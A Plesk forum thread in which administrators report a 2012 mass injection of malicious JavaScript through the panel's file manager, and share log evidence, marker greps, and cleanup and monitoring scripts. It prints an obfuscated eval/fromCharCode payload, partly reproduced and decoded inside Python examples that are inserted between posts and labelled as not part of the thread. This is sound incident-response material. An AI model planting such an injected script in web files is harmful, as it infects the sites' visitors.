
Security problem with filemng

galaxy

Regular Pleskian
Hi,

I've recently had dozens of sites hacked and malware inserted. But what was strange was all the files changed were still owned by the proper owners.

I did find a file that didn't belong named "index.htm" that had the following contents:

filemng: Error occured during /bin/cat command.<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(115,61,34,34,59,116,114,121,123,113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,34,49,50,51,34,43,110,41,59,125,99,97,116,99,104,40,113,119,41,123,104,61,45,48,49,54,47,55,59,116,114,121,123,97,61,112,114,111,116,111,116,121,112,101,59,125,99,97,116,99,104,40,122,120,99,41,123,101,61,119,105,110,100,111,119,91,34,101,34,43,34,118,97,34,43,34,108,34,93,59,110,61,34,50,48,52,46,51,53,49,46,52,52,48,46,52,57,53,46,50,51,50,46,51,49,53,46,52,52,52,46,53,53,48,46,54,52,46,51,51,48,46,52,48,52,46,54,48,48,46,50,51,50,46,50,52,54,46,51,56,56,46,53,53,48,46,50,48,48,46,51,51,51,46,52,51,54,46,51,57,48,46,50,51,52,46,51,50,55,46,51,57,50,46,53,48,53,46,50,50,56,46,49,50,48,46,49,54,52,46,54,49,53,46,50,54,46,51,48,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,52,55,50,46,52,56,53,46,50,50,56,46,57,54,46,52,49,54,46,53,50,53,46,54,52,46,49,56,51,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,50,51,48,46,51,48,51,46,52,48,52,46,53,48,48,46,54,52,46,49,52,49,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,49,54,50,46,49,55,55,46,53,50,46,53,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,50,51,54,46,50,57,49,46,52,53,54,46,49,54,48,46,50,49,54,46,51,51,51,46,49,50,56,46,51,48,53,46,54,52,46,51,52,56,46,52,49,54,46,53,50,53,46,50,51,48,46,49,51,56,46,52,54,48,46,53,48,53,46,50,48,50,46,51,48,48,46,49,50,56,46,49,56,53,46,54,52,46,51,52,56,46,52,49,54,46,53,50,53,46,50,51,48,46,49,51,56,46,51,50,52,46,50,57,53,46,50,54,46,51,48,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,52,55,50,46,52,56,53,46,50,50,56,46,57,54,46,52,54,52,46,53,48,53,46,50,51,48,46,51,52,56,46,49,50,56,46,51,48,53,46,54,52,46,51,52,56,46,52,49,54,46,53,50,53,46,50,51,48,46,49,51,56,46,50,54,48,46,49,54,48,46,56,52,46,57,54,46,52,51,50,46,53,53,53,
46,54,52,46,49,51,53,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,49,54,52,46,57,54,46,49,54,56,46,49,54,48,46,50,48,56,46,51,49,53,46,50,51,54,46,54,53,46,50,48,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,51,49,53,46,52,48,56,46,50,48,48,46,50,51,50,46,51,48,51,46,52,54,48,46,53,56,48,46,54,52,46,49,56,54,46,49,50,56,46,50,52,48,46,56,50,46,51,54,57,46,53,50,46,53,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,50,51,50,46,51,49,50,46,52,50,48,46,53,55,53,46,57,50,46,51,52,53,46,52,48,52,46,53,48,53,46,50,48,48,46,57,54,46,50,52,52,46,49,54,48,46,50,51,50,46,51,48,51,46,52,54,48,46,53,56,48,46,49,49,56,46,51,57,46,52,48,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,54,50,53,46,54,52,46,51,48,51,46,52,51,50,46,53,55,53,46,50,48,50,46,57,54,46,52,57,50,46,54,53,46,50,48,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,51,52,56,46,52,49,54,46,53,50,53,46,50,51,48,46,49,51,56,46,52,54,48,46,53,48,53,46,50,48,50,46,51,48,48,46,49,50,56,46,51,48,53,46,54,52,46,51,52,56,46,52,48,52,46,53,55,53,46,50,51,50,46,57,54,46,49,55,50,46,49,54,48,46,50,51,50,46,51,49,50,46,52,50,48,46,53,55,53,46,57,50,46,50,51,49,46,50,51,54,46,54,53,46,50,48,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,51,55,53,46,53,50,46,53,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,50,50,56,46,51,48,51,46,52,54,52,46,53,56,53,46,50,50,56,46,51,51,48,46,49,50,56,46,50,48,48,46,50,51,50,46,51,49,50,46,52,50,48,46,53,55,53,46,57,50,46,51,52,53,46,52,48,52,46,53,48,53,46,50,48,48,46,57,54,46,49,54,56,46,49,54,48,46,50,51,50,46,51,49,50,46,52,50,48,46,53,55,53,46,57,50,46,51,51,51,46,52,52,48,46,53,48,53,46,49,53,56,46,51,53,52,46,52,48,52,46,53,55,48,46,49,53,52,46,49,50,51,46,50,51,54,46,54,53,46,50,48,46,51,55,53,46,53,50,46,53,48,46,50,54,46,51,48,46,52,48,56,46,53,56,53,46,50,50,48,46,50,57,55,46,52,54,52,46,53,50,53,46,50,50,50,46,51,51,48,46,49,50,56,46,52,49,48,46,49,57,52,46,51,51,48,46,52,48
,48,46,53,53,53,46,50,49,56,46,50,51,52,46,52,54,56,46,53,52,53,46,49,57,54,46,51,48,51,46,52,53,54,46,51,53,53,46,50,48,50,46,51,51,48,46,52,48,52,46,53,55,48,46,49,57,52,46,51,52,56,46,52,52,52,46,53,55,48,46,56,48,46,51,53,49,46,52,52,48,46,53,50,53,46,50,52,48,46,49,50,51,46,52,57,50,46,54,53,46,50,48,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,51,53,52,46,51,56,56,46,53,55,48,46,54,52,46,51,48,48,46,49,50,56,46,51,48,53,46,54,52,46,51,51,48,46,52,48,52,46,53,57,53,46,54,52,46,50,48,52,46,51,56,56,46,53,56,48,46,50,48,50,46,49,50,48,46,52,54,56,46,53,53,48,46,50,49,48,46,51,54,48,46,49,54,56,46,50,52,53,46,57,54,46,49,52,52,46,49,57,50,46,50,48,53,46,49,49,56,46,51,57,46,52,48,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,53,57,48,46,49,57,52,46,51,52,50,46,49,50,56,46,53,55,53,46,54,52,46,49,56,51,46,49,50,56,46,53,48,48,46,57,50,46,51,48,57,46,52,48,52,46,53,56,48,46,49,52,52,46,51,51,51,46,52,54,56,46,53,55,48,46,50,51,48,46,49,50,48,46,49,54,52,46,49,54,48,46,49,50,52,46,57,54,46,49,57,54,46,50,53,48,46,54,52,46,49,56,57,46,49,50,56,46,50,52,53,46,54,52,46,49,55,52,46,49,50,56,46,50,52,48,46,49,49,56,46,51,57,46,52,48,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,50,51,48,46,51,48,51,46,52,48,52,46,53,48,48,46,54,52,46,49,56,51,46,49,50,56,46,50,53,48,46,49,48,50,46,49,53,54,46,50,49,50,46,50,55,48,46,49,49,48,46,49,54,56,46,50,50,56,46,50,52,48,46,57,56,46,57,54,46,49,55,50,46,49,54,48,46,56,48,46,51,48,48,46,49,56,52,46,53,49,53,46,50,48,50,46,51,52,56,46,51,48,56,46,53,53,53,46,50,50,48,46,51,52,56,46,52,49,54,46,50,48,48,46,56,50,46,57,54,46,49,54,56,46,49,54,48,46,57,54,46,51,54,48,46,50,56,48,46,51,53,48,46,49,52,48,46,50,49,48,46,50,56,48,46,51,53,48,46,56,50,46,57,54,46,49,55,50,46,49,54,48,46,56,48,46,51,48,48,46,49,56,52,46,53,49,53,46,50,48,50,46,51,52,56,46,50,55,50,46,52,56,53,46,50,51,50,46,51,48,51,46,49,54,48,46,50,48,53,46,54,52,46,49,50,54,46,49,50,56,46,50,52,48,46,50,52,48,46,50,4
9,48,46,50,56,48,46,51,53,48,46,49,52,48,46,49,50,51,46,49,55,50,46,49,54,48,46,56,48,46,50,51,49,46,51,56,56,46,53,56,48,46,50,48,56,46,49,51,56,46,52,53,54,46,53,53,53,46,50,51,52,46,51,51,48,46,52,48,48,46,50,48,48,46,50,51,48,46,57,54,46,49,54,56,46,49,54,48,46,57,54,46,51,54,48,46,50,56,48,46,51,53,48,46,49,52,48,46,49,50,51,46,49,54,52,46,50,57,53,46,50,54,46,51,48,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,52,54,52,46,53,50,48,46,50,49,48,46,51,52,53,46,49,56,52,46,51,50,53,46,54,52,46,49,56,51,46,49,50,56,46,50,54,48,46,49,49,50,46,49,53,48,46,50,50,48,46,50,52,53,46,49,49,56,46,51,57,46,52,48,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,49,53,52,46,57,54,46,50,52,52,46,49,54,48,46,49,48,48,46,49,52,55,46,50,48,56,46,50,55,53,46,49,48,52,46,49,54,56,46,50,4
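
The index.htm above carries the first stage of the injection: an eval of a String.fromCharCode list. The following is an added example, my own code rather than anything from the thread, that decodes that first layer. The character codes are the leading run copied from the post (the page's copy of the payload is cut off, so only this prefix is decoded), the sample file is constructed in the shape of the OP's index.htm, and the marker strings are the ones later posts grep for.

```python
import re

# Constructed from the post above: the leading run of character codes of the
# quoted payload (the page's copy is cut off, so only this prefix is decoded).
SAMPLE_CODES = (
    "115,61,34,34,59,116,114,121,123,113,61,100,111,99,117,109,101,110,116,46,"
    "99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,112,34,41,59,113,46,"
    "97,112,112,101,110,100,67,104,105,108,100,40,34,49,50,51,34,43,110,41,59,125,"
    "99,97,116,99,104,40,113,119,41,123,104,61,45,48,49,54,47,55,59,116,114,121,"
    "123,97,61,112,114,111,116,111,116,121,112,101,59,125,99,97,116,99,104,40,122,"
    "120,99,41,123,101,61,119,105,110,100,111,119,91,34,101,34,43,34,118,97,34,43,"
    "34,108,34,93,59")

# Constructed index.htm in the shape of the OP's file: the file-manager error
# text followed by the marked <script> block around eval(String.fromCharCode(...)).
SAMPLE_INDEX_HTM = (
    "filemng: Error occured during /bin/cat command."
    "<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(" + SAMPLE_CODES + "))"
    "/*qhk6sa6g1c*/</script>\n")

# The two markers later posts in the thread grep for.
START_MARK, END_MARK = "km0ae9gr6m", "qhk6sa6g1c"

# A *complete* fromCharCode call: the argument must be a comma-separated list
# of integers closed by ')', so a truncated copy does not match by accident.
FROMCHARCODE_RE = re.compile(
    r"String\.fromCharCode\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.IGNORECASE)


def decode_charcode_list(codes):
    """'115,61,...' -> the string the browser would build and hand to eval."""
    return "".join(chr(int(c)) for c in codes.split(","))


def is_marked(text):
    """True when both injection markers are present in the file contents."""
    return START_MARK in text and END_MARK in text


def decode_stage1(text):
    """Decode every complete String.fromCharCode(...) call found in text.
    Returns the decoded strings in document order; an empty list means no
    complete call was found (for example, a truncated copy)."""
    return [decode_charcode_list(m.group(1)) for m in FROMCHARCODE_RE.finditer(text)]


if __name__ == "__main__":
    for js in decode_stage1(SAMPLE_INDEX_HTM):
        print(js)
```

Running it prints `s="";try{q=document.createElement("p");q.appendChild("123"+n);}catch(qw){h=-016/7;try{a=prototype;}catch(zxc){e=window["e"+"va"+"l"];`. Two things worth noting for anyone grepping for this: the inner code reaches eval through `window["e"+"va"+"l"]`, so the literal string `eval` only appears in the outer wrapper, and it relies on the earlier statements throwing (`n` and `prototype` are undefined at that point) to reach the branch that does the work. The codes that follow on the page decode to the start of a second, numerically encoded string (`n="204.351.440...`) whose decoding routine lies past the point where the quoted copy stops, so this example ends at the first layer.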
 
Malicious code injection

Ditto here - lots of different sites, some simple HTML some complex PHP/SQL sites. Maybe something to do with - http://jsunpack.jeek.org ???

A range of files has been modified, all timestamped approx 14:00 GMT 02/July/2012. The only pattern seems to be that they are common file names, e.g. jquery.js / cycle.js / dropper.js / index.html

Example of the code inserted at the end of the facebook.js file : http://pastebin.com/vfhz1ug1

Would appreciate some feedback from the Plesk team, is this another vulnerability within the control panel?
 
It looks like they got copies of peoples passwords.

I was looking at /usr/local/psa/admin/logs/httpsd_access_log

and see there are people attacking from all over (so they have a network of compromised hosts attacking), going in and changing files throughout the server and inserting malware on home pages and included JavaScript pages.

I've spent all day today removing it from hundreds of domains...

I've disabled file manager (renamed the binary/wrapper), but not sure that's going to stop it yet.
 
Yup - I have the same. Apologies Parallels team, compromised Client account, so all domains within client@5 were modified by the attacker.

Changed the clients control panel password, will now keep an eye out for further access attempts.

Info from my log for reference:

124.253.128.166 domain.com:8443 - [02/Jul/2012:14:11:11 +0100] "GET /plesk/client@5/domain@101/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/ HTTP/1.1" 200 85107 "https://domain.com:8443/plesk/client@5/domain@101/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5"
 
It looks like most if not all of my clients were hacked. And they're going directly to each domain's URL to get in. In the log I see each line as:

123.45.67.89 domain1.com:8443 - ...
111.22.33.44 domain2.com:8443 - ...
...

I just renamed "filemng" in the /usr/local/psa/admin/bin directory until there's a fix.
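
The posts above pick the attack out of /usr/local/psa/admin/logs/httpsd_access_log by eye: many source addresses walking into one client account's domains through the file manager. The following is an added example, my own code and not from the thread or from Plesk, that does that grouping over log lines in the format of the line quoted above. The sample lines are constructed with documentation-range addresses, the file-manager path pattern is taken from the quoted line, and the threshold of two distinct source IPs per client account is an assumption to tune per server.

```python
import re
from collections import defaultdict

# Constructed sample lines in the httpsd_access_log format quoted above; the
# addresses are from documentation ranges, not the ones seen in the attack.
SAMPLE_LOG = """\
192.0.2.10 domain1.com:8443 - [02/Jul/2012:14:11:11 +0100] "GET /plesk/client@5/domain@101/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/ HTTP/1.1" 200 85107 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5"
198.51.100.7 domain2.com:8443 - [02/Jul/2012:14:11:40 +0100] "GET /plesk/client@5/domain@102/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/ HTTP/1.1" 200 84990 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5"
203.0.113.99 domain3.com:8443 - [02/Jul/2012:14:12:03 +0100] "GET /plesk/client@5/domain@103/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/ HTTP/1.1" 200 85107 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5"
192.0.2.44 domain1.com:8443 - [02/Jul/2012:14:12:30 +0100] "GET /plesk/client@5/domain@101/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/ HTTP/1.1" 200 85107 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5"
198.51.100.200 mysite.example:8443 - [02/Jul/2012:15:02:17 +0100] "GET /plesk/client@7/domain@120/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/ HTTP/1.1" 200 85107 "https://mysite.example:8443/plesk/client@7/domain@120/hosting/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/13.0"
198.51.100.200 mysite.example:8443 - [02/Jul/2012:15:02:20 +0100] "GET /plesk/client@7/domain@120/hosting/ HTTP/1.1" 200 43210 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/13.0"
"""

# One access-log line: ip, vhost:port, ident, [timestamp], "METHOD path proto",
# status, size, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<vhost>\S+) \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# The file-manager URL shape from the quoted line; client@N is the account.
FM_RE = re.compile(
    r"^/plesk/client@(?P<client>\d+)/domain@(?P<domain>\d+)/hosting/file-manager/")


def parse_line(line):
    """Dict of the log fields, or None when the line is not in this format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def file_manager_hits(log_text):
    """Every parsed line that hits the file manager, with client/domain added."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        fm = FM_RE.match(rec["path"])
        if not fm:
            continue
        rec.update(fm.groupdict())
        hits.append(rec)
    return hits


def suspicious_clients(hits, min_ips=2):
    """Client accounts using the file manager from at least min_ips distinct
    source addresses, with the addresses, domain IDs and hit count seen."""
    by_client = defaultdict(lambda: {"ips": set(), "domains": set(), "hits": 0})
    for h in hits:
        c = by_client[h["client"]]
        c["ips"].add(h["ip"])
        c["domains"].add(h["domain"])
        c["hits"] += 1
    return {
        client: {"ips": sorted(v["ips"]), "domains": sorted(v["domains"]), "hits": v["hits"]}
        for client, v in sorted(by_client.items())
        if len(v["ips"]) >= min_ips
    }


if __name__ == "__main__":
    for client, info in suspicious_clients(file_manager_hits(SAMPLE_LOG)).items():
        print("client@%s: %d file-manager hits from %s on domains %s"
              % (client, info["hits"], info["ips"], info["domains"]))
```

Run it over the real log with `suspicious_clients(file_manager_hits(open(path).read()))`. A client who legitimately works from two places will trip `min_ips=2`; the stronger signal in the quoted logs is one account touching many domain@ IDs from many addresses within minutes, which is what the `domains` and `hits` fields expose.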
 
Well. Some time ago we published KB articles about this SQL injection vulnerability, the method for fixing it, and a script for mass password changing. All these actions should prevent negative consequences of this vulnerability. But two known problems still remain:

- infected content was deployed on the Plesk server before all the mentioned protection actions were applied, and it is still active;
- some users changed their passwords back to the previous ones (known to the hackers) after running the mass password-changing script;

Now you can determine and remove all infected .js (or other) scripts by their known markers with something like:

grep -r 'km0ae9gr6m' /var/www/vhosts

or

grep -r 'qhk6sa6g1c' /var/www/vhosts

And you should apply the fix and change passwords with the mass password-changing script if you have still not performed these protection actions.
 
Plesk update.

Hi.

I have Plesk 9.3.

Will the update to most up to date plesk solve this issue?

Best Regards.
 
When I did my last post I renamed the filemng file to prevent its usage and tried to remove all infections I found.

I'm now monitoring if they appear again.

I've gone to the page you instructed, downloaded the "checker" and the result is:

The patch has been successfully applied.

Does this mean I'm safe and can rename filemng back to its original name?

Best Regards.
 
I had patched the system for the vulnerability, but then recently (a few months ago), upgraded to 9.5.4. I also have a firewall blocking remote SQL on port 3306. They still got in apparently. I needed to stay in the 9.x realm because I have too many people reliant on the Sitebuilder and have been working to keep it and migrate the sitebuilder 4.5 to another VPS.
 

Did you change all passwords with the corresponding script too?
 
our systems have also been plagued by this attack.

It's in jquery's and index.html's all over the servers.

Can you confirm this *is* a vulnerability within the plesk admin section?
 
Seems funny that this attack only just happened to everybody as well.
 
Ok just registered so I could add to this - exact same hack attempt here.

If it's already happened - here are some tips.

Find the files that have been modified in the past day within vhost, try -
Code:
find /var/www/vhosts \( -name "*.js" -o -name "*.php" -o -name "index.*" -o -name "default.*" \) -ctime -1
Then if you want to remove the string based on the code shown by the OP at the start you could use (make a backup if you're concerned about the replacement's effect!) -
Code:
find /var/www/vhosts \( -name "*.js" -o -name "*.php" -o -name "index.*" -o -name "default.*" \) -ctime -1 -exec sed -i 's/km0ae9gr6m[^>]*qhk6sa6g1c/youreplacementtexthere/g' {} \;
OK, now that the files are clean check the system again for the injected script -
Code:
grep -rl km0ae9gr6m /var/www/vhosts
this will just display the files found with the string used at the start of the injected code.

Hopefully it finds no files

So what else could be done -

Rename the plesk filemanager as mentioned above.

Additionally and to check when next time your files are changed -

Setup a simple cron script to check to let you know when files are modified. I use find again but you could use inotify.

So let's check every 5 min for files that have changed in the last 10 min in vhosts, and send a warning email when this happens (not ideal for servers with 50+ sites, but for smaller sets or just to check a specific site, it's good) -

Code:
#!/bin/bash
# Watched file types under vhosts whose inode changed (ctime) in the last 10 min
fts=$(find /var/www/vhosts \( -name "*.js" -o -name "*.php" -o -name "index.*" -o -name "default.*" \) -cmin -10)
# Only send mail when something was found
if [ -n "$fts" ]; then
    echo "$fts" | mail -s "Files were modified $(date +%Y-%m-%d-%r)" [email protected]
fi

save this as a script and set it up as a cron job to run every 5 min.

Finally, if you feel the VPS is compromised and you are paranoid about further attacks - migrate to a new one

Hope this info is of help and saves some time for others
 
Heh,
Nice post :D

Nice to see us sysadmins thinking alike. Cleaned 100 files so far using the methods above (well, similar methods)
 
Thanks, any improvements (especially on the sed) let me know, I'm ad-libbing :)

Another possible point is to see if you can restrict plesk control panel to your ip or at least the port.
 
Here's the perl command line

Got infected
System went for upgrade from 9.5.1 to 9.5.4, 5 hours of downtime due to stupid mail_restore (keep rsync -aq the whatever) (lost a few clients along the way) Alas... problem persists.

grep -R km0ae9gr6m /var/www/vhosts
get the filenames
perl -pi -e 'BEGIN{undef $/;} s/\/\*km0ae9gr6m.*qhk6sa6g1c\*\///smg' FILENAME

I have been running this for days until I gave up (9.5.4 plesk btw), I have just renamed the filemng.

Was in Super old Ensim in FC1 for many many years, and never have such issue and it's even more secure with its super chroot environment.

Hope the command line helps.

Cheers.
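
The marker grep in the Plesk staff post, the find/sed pass in the tips post above, and the perl one-liner in this post all do the same job. The following is one added example that serves all three (my own code, not anything from the thread or from Plesk): it scans a vhosts tree for the km0ae9gr6m marker, keeps a copy of each infected file, and removes every `/*km0ae9gr6m*/ ... /*qhk6sa6g1c*/` block with a non-greedy, multi-line match. The sample files, the `example.test` site and the `.infected` backup suffix are constructed for the demonstration; the marker strings are the ones quoted in the thread.

```python
import os
import re
import tempfile

# Markers of the injected block as quoted in the thread: /*km0ae9gr6m*/ ... /*qhk6sa6g1c*/
START_MARK = "km0ae9gr6m"
END_MARK = "qhk6sa6g1c"
BACKUP_SUFFIX = ".infected"                      # assumption: where the original is kept
SCAN_SUFFIXES = (".js", ".php", ".htm", ".html")  # plus index.* / default.* as in the find

# Non-greedy and DOTALL: a payload that spans lines or contains '>' is still
# matched, and two injections in one file are removed separately instead of
# everything between the first start and the last end marker.
INJECTION_RE = re.compile(
    r"(?:<script>\s*)?/\*" + re.escape(START_MARK) + r"\*/.*?/\*"
    + re.escape(END_MARK) + r"\*/(?:\s*</script>)?", re.DOTALL)


def strip_injection(text):
    """Return (cleaned_text, number_of_complete_injections_removed)."""
    return INJECTION_RE.subn("", text)


def find_infected(root):
    """Sorted paths under root (web files only, backups skipped) containing the start marker."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            lname = name.lower()
            if lname.endswith(BACKUP_SUFFIX):
                continue
            if not (lname.endswith(SCAN_SUFFIXES) or lname.startswith(("index.", "default."))):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    if START_MARK.encode() in fh.read():
                        hits.append(path)
            except OSError:
                continue
    return sorted(hits)


def clean_tree(root):
    """Strip injections in place (same inode, so owner and mode are kept) and keep
    the original beside it. A file whose marker is not part of a complete block
    is left untouched for manual review. Returns {path: injections_removed}."""
    result = {}
    for path in find_infected(root):
        with open(path, "rb") as fh:
            raw = fh.read()
        cleaned, n = strip_injection(raw.decode("utf-8", errors="surrogateescape"))
        if n == 0:
            continue
        with open(path + BACKUP_SUFFIX, "wb") as fh:
            fh.write(raw)
        with open(path, "wb") as fh:
            fh.write(cleaned.encode("utf-8", errors="surrogateescape"))
        result[path] = n
    return result


# Constructed sample files modelled on the injections described in the thread.
INJECTED_JS = (
    "function legit(){return 1;}\n"
    "/*km0ae9gr6m*/window.eval(String.fromCharCode(115,61,34,34,59));\n"
    "if(x>1){y()}/*qhk6sa6g1c*/\n"
    "function alsoLegit(a){return a>1;}\n"
    "/*km0ae9gr6m*/try{z()}catch(e){}/*qhk6sa6g1c*/\n")
INJECTED_HTML = (
    "<html><body>hello</body></html>\n"
    "<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(115,61,34,34,59));"
    "/*qhk6sa6g1c*/</script>\n")
TRUNCATED_JS = "var x=1;\n/*km0ae9gr6m*/window.eval(String.fromCharCode(115,61"  # no end marker
CLEAN_JS = "var a=1;\n"


def demo():
    """Build a throwaway vhosts tree, clean it, and report what happened."""
    root = tempfile.mkdtemp(prefix="vhosts-demo-")
    site = os.path.join(root, "example.test", "httpdocs")
    os.makedirs(site)
    samples = {"jquery.js": INJECTED_JS, "index.html": INJECTED_HTML,
               "dropper.js": TRUNCATED_JS, "cycle.js": CLEAN_JS}
    for name, body in samples.items():
        with open(os.path.join(site, name), "w") as fh:
            fh.write(body)

    def rel(p):
        return os.path.relpath(p, root)

    before = [rel(p) for p in find_infected(root)]
    removed = {rel(p): n for p, n in clean_tree(root).items()}
    after = [rel(p) for p in find_infected(root)]
    with open(os.path.join(site, "jquery.js")) as fh:
        cleaned_js = fh.read()
    return {"infected_before": before, "removed": removed, "infected_after": after,
            "cleaned_js": cleaned_js,
            "backup_kept": os.path.exists(os.path.join(site, "jquery.js" + BACKUP_SUFFIX))}


if __name__ == "__main__":
    print(demo())
```

The difference from the one-liners: sed's `[^>]*` works line by line and stops at the first `>`, so a payload that wraps across lines or contains a `>` stays in place, and perl's `.*` under `/s` is greedy, so a file carrying two injections loses the legitimate code between them. `demo()` builds a throwaway tree that shows both cases plus a truncated injection that is reported but deliberately not rewritten. Run `clean_tree('/var/www/vhosts')` on a real server only after a backup; the rewrite reuses the inode, so owner and mode survive, but the ctime changes, which a find-based change monitor will report.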
 
Can Parallels confirm if this is a security issue that will be addressed by a micro update?
It seems very strange that (a) this exploit didn't arise until July 2nd and (b) that this has anything to do with the previous exploit.

This looks to me like the micro patches were not effective.
 
Same here, and the fix was already applied (KB 113424):

> php -d safe_mode=0 plesk_remote_vulnerability_checker.php
The patch has been successfully applied.
 